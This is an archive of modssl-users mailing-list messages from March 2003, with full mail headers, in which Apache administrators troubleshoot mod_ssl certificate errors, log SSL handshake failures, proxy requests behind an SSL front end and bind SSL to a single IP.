> Is there an easy way to determine what version of mod_ssl Apache is
> actually loading?

try "strings httpd | grep 'mod_ssl/'"

>
> Any help would be great! Thanx!

Cheers
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 15:05:39 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2236F2AA034; Wed,  5 Mar 2003 15:05:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from billerica.horizons.titan.com (billerica.horizons.titan.com [207.252.43.13])
	by master.modssl.org (Postfix) with ESMTP id 643E72AA01A
	for ; Wed,  5 Mar 2003 15:05:37 +0100 (CET)
Received: from trgmail1.trg0.titan.com (trg.titan.com [159.62.121.15])
	by billerica.horizons.titan.com (8.12.8/8.12.8) with ESMTP id h25E5ZlR022739
	for ; Wed, 5 Mar 2003 09:05:35 -0500
Received: from BTG-OMILLER1 ([159.62.158.101]) by trgmail1.trg0.titan.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id GCM0Y6SR; Wed, 5 Mar 2003 09:03:38 -0500
Date: Wed, 5 Mar 2003 09:05:32 -0500
From: "Otto L. Miller" 
X-Mailer: The Bat! (v1.60c) Personal
Organization: Titan Systems Corp.
X-Priority: 3 (Normal)
Message-ID: <1767216797.20030305090532@titan.com>
To: modssl-users@modssl.org
Subject: mod_ssl/openssl error with test certificate?
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Otto L. Miller" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

modssl-users,

OK, I just built an apache + mod_ssl + mod_perl configuration.  I
built the test certificate and installed it (make certificate && make
install).  But when I 'apachectl startssl' I get the following
message:

[error] Init: Unable to read server certificate from file /opt/sisapache/conf/ssl.crt/server.crt (OpenSSL library error follows)
[error] OpenSSL: error:0D09F007:asn1 encoding routines:d2i_X509:expecting an asn1 sequence

I checked permissions and thought that might be the problem, however,
the problem persists even if I 'chmod 444
/opt/sisapache/conf/ssl.crt/server.crt'.  Any thoughts?

Thanks,
Otto
---
Otto L. Miller
Network Architect
omiller@titan.com
Titan Systems
3877 Fairfax Ridge Road
Fairfax, VA  22030-7448
Phone:  703-383-8022
Fax:    703-383-4055

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 15:09:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A7F8C2AA035; Wed,  5 Mar 2003 15:09:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tarbuck.nosignal.org (tarbuck.nosignal.org [212.43.167.149])
	by master.modssl.org (Postfix) with ESMTP id 561742AA027
	for ; Wed,  5 Mar 2003 15:09:14 +0100 (CET)
Received: from mail.comodogroup.com ([212.56.93.10] helo=212.56.93.10)
	by tarbuck.nosignal.org with esmtp (Exim 3.35 #1 (Debian))
	id 18qZcS-0004Hv-00
	for ; Wed, 05 Mar 2003 14:11:40 +0000
Received: from [192.168.0.51] (helo=viper.comodo.net)
	by 212.56.93.10 with esmtp (Exim 3.35 #1 (Debian))
	id 18qZYL-00064I-00
	for ; Wed, 05 Mar 2003 14:07:25 +0000
Message-Id: <5.1.1.6.2.20030305132109.032079c0@192.168.0.202>
X-Sender: tim@192.168.0.202
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Wed, 05 Mar 2003 14:09:02 +0000
To: modssl-users@modssl.org
From: Tim Fowle 
Subject: How to log errors
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Fowle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have had a look in the archives but couldnt find definate answers to the following:


Im running a website that has ssl working quite happily for some time. However when errors occur it would be useful to get more details out to diagnose the errors better. For example, i use client authentication for part of the site. A few times a day i will get an error like the following:


[Tue Mar  4 13:16:22 2003] [error] mod_ssl: SSL handshake failed (server xxx.xxx.xxx:443, client 198.137.241.11) (OpenSSL library error follows)
[Tue Mar  4 13:16:22 2003] [error] OpenSSL: error:14094412:SSL routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint: Subject CN in certificate not server name or identical to CA!?]


Is it possible (and if so how) to log the details from this certificate without having to change the logging level of mod_ssl?
I could change the level but i would end up with faaar to big logs.
Is it possible to add something to the end of the LogFormat line?


Secondly is it normal to get quite a few of the following:
[Tue Mar  4 13:45:09 2003] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows)
[Tue Mar  4 13:45:09 2003] [error] System: Connection reset by peer (errno: 104)


Thanks for any help
Tim Fowle

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 19:23:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5267F2AA034; Wed,  5 Mar 2003 19:23:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR001.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id BA6312AA01A
	for ; Wed,  5 Mar 2003 19:23:18 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.202.196.90])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HBA00LD8GD54Y@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Wed, 05 Mar 2003 13:22:17 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Wed,
 05 Mar 2003 13:21:59 -0500
Date: Wed, 05 Mar 2003 13:21:59 -0500
From: Geoff Thorpe 
Subject: Re: mod_ssl/openssl error with test certificate?
In-reply-to: <1767216797.20030305090532@titan.com>
To: modssl-users@modssl.org
Message-id: <20030305182159.GB1908@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <1767216797.20030305090532@titan.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Otto L. Miller (omiller@titan.com) wrote:

[snip]

> I checked permissions and thought that might be the problem, however,
> the problem persists even if I 'chmod 444
> /opt/sisapache/conf/ssl.crt/server.crt'.  Any thoughts?

Could you post a copy of the server.crt file?

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 20:48:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2CB4D2AA034; Wed,  5 Mar 2003 20:48:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from voyager.scgis.com. (adsl-068-016-197-035.sip.cae.bellsouth.net [68.16.197.35])
	by master.modssl.org (Postfix) with ESMTP id 0CAA82AA01A
	for ; Wed,  5 Mar 2003 20:48:04 +0100 (CET)
Received: from crash (adsl-068-016-197-034.sip.cae.bellsouth.net [68.16.197.34])
	by voyager.scgis.com. (8.12.8/8.12.8) with SMTP id h25Jm0nn004533
	for ; Wed, 5 Mar 2003 14:48:01 -0500 (EST)
	(envelope-from cdavis@scgis.com)
Message-ID: <00a101c2e350$98ce2210$0301010a@crash>
From: "Chris Davis" 
To: 
Subject: Proxy http with modssl?
Date: Wed, 5 Mar 2003 14:51:21 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Davis" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


 Hi,

 I'm looking for a method to hide an old web server behind
 a modssl server. The hidden server has several applications
 served over http. What I'd like is for https requests
 to be rewritten in modssl and proxied to the hidden
 internal system.

 I installed a second interface on the modssl system. From
 the modssl system I can access the internal web server.
 In a virtualhost clause for the modssl system I've added

 ProxyRequests On
 ProxyRemote https://modssl/MyApp http://10.x.x.x

 I'd like requests of the form
 https://modssl/MyApp/pgm?SomeArgument=Value to be proxied
 to the internal system as http://10.x.x.x/pgm?SomeArgument=Value
 I receive a 404 in the browser and the following in my error log.

[Wed Mar 04 11:14:25 2003] [error] (20014)Error string
not specified yet: Cannot store SSL session to DBM file
`/usr/local/www/logs/ssl_scache'
[Wed Mar 04 11:14:25 2003] [error] [client 1.2.3.4] File does not exist:
/usr/local/www/htdocs/MyApp

 Is it possible to have modssl proxy an http conversation?

 Thanks for any advice, Chris





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 21:20:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 398292AA034; Wed,  5 Mar 2003 21:20:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from billerica.horizons.titan.com (billerica.horizons.titan.com [207.252.43.13])
	by master.modssl.org (Postfix) with ESMTP
	id E078A2AA01A; Wed,  5 Mar 2003 21:20:04 +0100 (CET)
Received: from trgmail1.trg0.titan.com (trg.titan.com [159.62.121.15])
	by billerica.horizons.titan.com (8.12.8/8.12.8) with ESMTP id h25KK0lR021569;
	Wed, 5 Mar 2003 15:20:00 -0500
Received: from BTG-OMILLER1 ([159.62.158.101]) by trgmail1.trg0.titan.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id GCM0ZCLY; Wed, 5 Mar 2003 15:17:58 -0500
Date: Wed, 5 Mar 2003 15:19:33 -0500
From: "Otto L. Miller" 
X-Mailer: The Bat! (v1.60c) Personal
Organization: Titan Systems Corp.
X-Priority: 3 (Normal)
Message-ID: <19029659387.20030305151933@titan.com>
To: owner-modssl-users@modssl.org,
	Geoff Thorpe 
Cc: modssl-users@modssl.org
Subject: Re[2]: mod_ssl/openssl error with test certificate?
In-Reply-To: <20030305182159.GB1908@grumpy.geoffnet>
References: <1767216797.20030305090532@titan.com>
 <20030305182159.GB1908@grumpy.geoffnet>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Otto L. Miller" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Geoff,

Opps!  Checked out the file and it is a dummy ascii file :-(.  I
replaced it with a 'real' file from the source tree and then it whined
about the private key.  It too was a dummy ascii file.  I replaced it
with a 'real' key file and voila... it all works!  It never occurred
to me that 'make install' *does not* install the certificate files
files. Thanks to all who spent time on this!

Thanks,
Otto
---
Otto L. Miller
Network Architect
omiller@titan.com
Titan Systems
3877 Fairfax Ridge Road
Fairfax, VA  22030-7448
Phone:  703-383-8022
Fax:    703-383-4055

Wednesday, March 5, 2003, 1:21:59 PM, you wrote:

> * Otto L. Miller (omiller@titan.com) wrote:

> [snip]

>> I checked permissions and thought that might be the problem, however,
>> the problem persists even if I 'chmod 444
>> /opt/sisapache/conf/ssl.crt/server.crt'.  Any thoughts?

> Could you post a copy of the server.crt file?

> Cheers,
> Geoff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 23:20:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 97FAD2AA034; Wed,  5 Mar 2003 23:20:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41504.mail.yahoo.com (web41504.mail.yahoo.com [66.218.93.87])
	by master.modssl.org (Postfix) with SMTP id BD5442AA01A
	for ; Wed,  5 Mar 2003 23:20:12 +0100 (CET)
Message-ID: <20030305222010.39049.qmail@web41504.mail.yahoo.com>
Received: from [204.31.161.70] by web41504.mail.yahoo.com via HTTP; Wed, 05 Mar 2003 14:20:10 PST
Date: Wed, 5 Mar 2003 14:20:10 -0800 (PST)
From: kulkarni veena 
Subject: question.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

To have SSL enabled server with self-signed
certificate do we need

 Apache+openSSL+ModSSL or just Apache+ModSSL ?

thanks in advance.

-veena

__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 23:59:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2A9B02AA034; Wed,  5 Mar 2003 23:59:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41501.mail.yahoo.com (web41501.mail.yahoo.com [66.218.93.84])
	by master.modssl.org (Postfix) with SMTP id 4EBC42AA01A
	for ; Wed,  5 Mar 2003 23:59:44 +0100 (CET)
Message-ID: <20030305225941.30104.qmail@web41501.mail.yahoo.com>
Received: from [204.31.161.70] by web41501.mail.yahoo.com via HTTP; Wed, 05 Mar 2003 14:59:41 PST
Date: Wed, 5 Mar 2003 14:59:41 -0800 (PST)
From: kulkarni veena 
Subject: two server certificates.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have one machine which has apache+mod_ssl with a
self signed server certificate. is it possible to have
another self signed certificate using the same
Apache+mod_ssl instance but say a different port?


thanks in advance.

-veena


__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 00:06:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 221CB2AA020; Thu,  6 Mar 2003 00:06:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wlv.to.gd-es.com (WLV.TO.GD-ES.COM [199.107.242.11])
	by master.modssl.org (Postfix) with ESMTP id AAC0C2AA015
	for ; Thu,  6 Mar 2003 00:06:46 +0100 (CET)
Received: from SPIELPLATZ.CATO.GD-AIS.COM (mcc@SPIELPLATZ.CATO.GD-AIS.COM [199.107.242.254])
	by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id h25Kucq29130;
	Wed, 5 Mar 2003 12:56:38 -0800 (PST)
Date: Wed, 5 Mar 2003 12:56:38 -0800 (PST)
From: Merton Campbell Crockett 
To: Chris Davis 
Cc: modssl-users@modssl.org
Subject: Re: Proxy http with modssl?
In-Reply-To: <00a101c2e350$98ce2210$0301010a@crash>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Merton Campbell Crockett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Chris:

Look at Ralph Engelshall's paper on the Apache web site discussing the
mod_rewrite module.  You can provide all the SSL/TLS support on your
front-end server and use mod_rewrite to generate HTTP requests to the old
web server.

Merton Campbell Crockett


On Wed, 5 Mar 2003, Chris Davis wrote:

> 
>  Hi,
> 
>  I'm looking for a method to hide an old web server behind
>  a modssl server. The hidden server has several applications
>  served over http. What I'd like is for https requests
>  to be rewritten in modssl and proxied to the hidden
>  internal system.
> 
>  I installed a second interface on the modssl system. From
>  the modssl system I can access the internal web server.
>  In a virtualhost clause for the modssl system I've added
> 
>  ProxyRequests On
>  ProxyRemote https://modssl/MyApp http://10.x.x.x
> 
>  I'd like requests of the form
>  https://modssl/MyApp/pgm?SomeArgument=Value to be proxied
>  to the internal system as http://10.x.x.x/pgm?SomeArgument=Value
>  I receive a 404 in the browser and the following in my error log.
> 
> [Wed Mar 04 11:14:25 2003] [error] (20014)Error string
> not specified yet: Cannot store SSL session to DBM file
> `/usr/local/www/logs/ssl_scache'
> [Wed Mar 04 11:14:25 2003] [error] [client 1.2.3.4] File does not exist:
> /usr/local/www/htdocs/MyApp
> 
>  Is it possible to have modssl proxy an http conversation?
> 
>  Thanks for any advice, Chris
> 

-- 
BEGIN:				vcard
VERSION:			3.0
FN:				Merton Campbell Crockett
ORG:				General Dynamics Advanced Information Systems;
				Intelligence and Exploitation Systems
N:				Crockett;Merton;Campbell
EMAIL;TYPE=internet:		mcc@CATO.GD-AIS.COM
TEL;TYPE=work,voice,msg,pref:	+1(805)497-5045
TEL;TYPE=work,fax:		+1(805)497-5050
TEL;TYPE=cell,voice,msg:	+1(805)377-6762
END:				vcard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 00:07:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8B1AA2AA020; Thu,  6 Mar 2003 00:07:11 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41503.mail.yahoo.com (web41503.mail.yahoo.com [66.218.93.86])
	by master.modssl.org (Postfix) with SMTP id C8D5B2AA015
	for ; Thu,  6 Mar 2003 00:07:09 +0100 (CET)
Message-ID: <20030305230702.84999.qmail@web41503.mail.yahoo.com>
Received: from [204.31.161.70] by web41503.mail.yahoo.com via HTTP; Wed, 05 Mar 2003 15:07:02 PST
Date: Wed, 5 Mar 2003 15:07:02 -0800 (PST)
From: kulkarni veena 
Subject: two server certificates..
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

is it possible to have one instance of Apache+mod_ssl
and have two server cerificates using two different
ports for SSL connection.

Thanks in advance.

-veena

__________________________________________________
Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
http://taxes.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 00:54:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 02BCD2AA020; Thu,  6 Mar 2003 00:54:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.euronet.nl (smtp1.euronet.nl [194.134.35.133])
	by master.modssl.org (Postfix) with ESMTP id 89B062AA015
	for ; Thu,  6 Mar 2003 00:54:32 +0100 (CET)
Received: from gatekeeper.klaverstijn.nl (niwg-n-0e41.mxs.adsl.euronet.nl [212.129.142.65])
	by smtp1.euronet.nl (Postfix) with ESMTP id E46456715A
	for ; Thu,  6 Mar 2003 00:54:30 +0100 (MET)
Received: from WORKHORSE (WORKHORSE.klaverstijn.nl [192.168.0.196])
	by gatekeeper.klaverstijn.nl (Postfix) with SMTP id 00FAB2402A
	for ; Thu,  6 Mar 2003 00:54:29 +0100 (CET)
Message-ID: <00d401c2e372$7c9f0b50$c400a8c0@klaverstijn.nl>
From: "Jan Klaverstijn" 
To: 
References: <20030305230702.84999.qmail@web41503.mail.yahoo.com>
Subject: Re: two server certificates..
Date: Thu, 6 Mar 2003 00:53:57 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jan Klaverstijn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You can of you use virtual hosts. See the Apache doc and the mod-ssl faq on using one daemon that handles both ssl and non-ssl
traffic. This is very similar.

Jan


----- Original Message -----
From: "kulkarni veena" 
To: 
Sent: Thursday, March 06, 2003 12:07 AM
Subject: two server certificates..


> Hi,
>
> is it possible to have one instance of Apache+mod_ssl
> and have two server cerificates using two different
> ports for SSL connection.
>
> Thanks in advance.
>
> -veena
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Tax Center - forms, calculators, tips, more
> http://taxes.yahoo.com/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 06:56:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 946C62AA020; Thu,  6 Mar 2003 06:56:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id 3C5BA2AA015
	for ; Thu,  6 Mar 2003 06:56:13 +0100 (CET)
Received: by gamay.kronodoc.fi (Postfix, from userid 501)
	id 5DEBD14033; Thu,  6 Mar 2003 07:56:09 +0200 (EET)
Received: from localhost (localhost [127.0.0.1])
	by gamay.kronodoc.fi (Postfix) with ESMTP id 42675240A9
	for ; Thu,  6 Mar 2003 07:56:09 +0200 (EET)
Date: Thu, 6 Mar 2003 07:56:09 +0200 (EET)
From: Marko Asplund 
To: modssl-users@modssl.org
Subject: Re: Proxy http with modssl?
In-Reply-To: <00a101c2e350$98ce2210$0301010a@crash>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 5 Mar 2003, Chris Davis wrote:

>  I'm looking for a method to hide an old web server behind
>  a modssl server. The hidden server has several applications
>  served over http. What I'd like is for https requests
>  to be rewritten in modssl and proxied to the hidden
>  internal system.
>  ...

there are probably several possible implementations for the reverse proxy
configuration you're describing but one possibility is to use mod_accel
(http://sysoev.ru/mod_accel/) for this purpose.

best regards,
-- 
	aspa					http://www.kronodoc.fi/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 07:03:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BF6952AA020; Thu,  6 Mar 2003 07:03:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gamay.kronodoc.fi (gamay.kronodoc.fi [195.255.175.66])
	by master.modssl.org (Postfix) with ESMTP id 0974F2AA015
	for ; Thu,  6 Mar 2003 07:03:07 +0100 (CET)
Received: by gamay.kronodoc.fi (Postfix, from userid 501)
	id 535B814033; Thu,  6 Mar 2003 08:03:05 +0200 (EET)
Received: from localhost (localhost [127.0.0.1])
	by gamay.kronodoc.fi (Postfix) with ESMTP id 422CF240A9
	for ; Thu,  6 Mar 2003 08:03:05 +0200 (EET)
Date: Thu, 6 Mar 2003 08:03:05 +0200 (EET)
From: Marko Asplund 
To: modssl-users@modssl.org
Subject: Re: question.
In-Reply-To: <20030305222010.39049.qmail@web41504.mail.yahoo.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Marko Asplund 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 5 Mar 2003, kulkarni veena wrote:

> To have SSL enabled server with self-signed
> certificate do we need
> 
>  Apache+openSSL+ModSSL or just Apache+ModSSL ?

mod_ssl needs to be linked against OpenSSL libraries so you need to have
OpenSSL if you want to compile mod_ssl. you don't need to have OpenSSL
libraries installed on the OS to run mod_ssl if you use static linking.
the OpenSSL application is very useful for many PKI operations (handling
certificate requests, keys, certificates etc.) but it's not really
required.

best regards,
-- 
	aspa					http://www.kronodoc.fi/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 07:39:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9B4E2AA020; Thu,  6 Mar 2003 07:39:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from redback.adroit.net (redback.adroit.net [203.89.254.243])
	by master.modssl.org (Postfix) with ESMTP id 455742AA015
	for ; Thu,  6 Mar 2003 07:39:08 +0100 (CET)
Received: from adroit.net ([202.129.84.50])
	by redback.adroit.net (8.12.3/8.12.3/Debian-5) with ESMTP id h266d38u027361
	for ; Thu, 6 Mar 2003 17:39:05 +1100
Message-ID: <3E66EC7C.4000002@adroit.net>
Date: Thu, 06 Mar 2003 17:36:44 +1100
From: Terry Kerr 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.6) Gecko/20011120
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: stop apache/mod_ssl binding to all IP's.
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Terry Kerr 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I am running apache 1.3.26 and mod_ssl 2.8.9-2.1 on a debian linux system.

The system has two IP's, and I only wish for apache to start on ports 80 and 443 
on one of those IPs.  I am using named based virtual hosting for many sites on 
the system for http, and have just one virtual host setup for https on port 443. 
  The problem that I am having is that I cannot stop mod_ssl from binding to 
port 443 on both the IP's on my system.  I have tried every possible combination 
of Listen, BindAddress, and Port, and have managed to prevent http from starting 
on all IP's, but https still starts on all IPs.  Is there any way to stop this?

Will I need to start two seperate servers, one serving http only, and one 
serving https only?  If I was to do this, I may as well go back to using 
apache-ssl which is the default installation on debian anyway.

Thanks in advance

terry

-- 
Terry Kerr (terry@adroit.net)
Adroit Internet Solutions (www.adroit.net)
Phone: +61 3 9563 4461
Fax: +61 3 9563 3856

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
